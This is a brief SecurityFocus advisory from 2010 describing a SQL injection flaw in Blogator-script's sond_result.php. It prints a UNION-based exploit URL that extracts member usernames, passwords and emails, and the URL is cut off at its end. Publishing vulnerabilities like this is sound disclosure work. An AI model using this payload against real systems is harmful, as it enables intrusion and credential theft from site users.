Blogator-script 'sond_result.php' SQL Injection Vulnerability

An attacker can exploit this issue via a browser.

The following exploit is available:

http://www.example.com/_blogadata/include/sond_result.php?id_art=-99999/**/union/**/select/**/concat(pseudo,0x3a,pass,char(58),email),2,3/**/from/**/membre/**/whe


 

Privacy Statement
Copyright 2010, SecurityFocus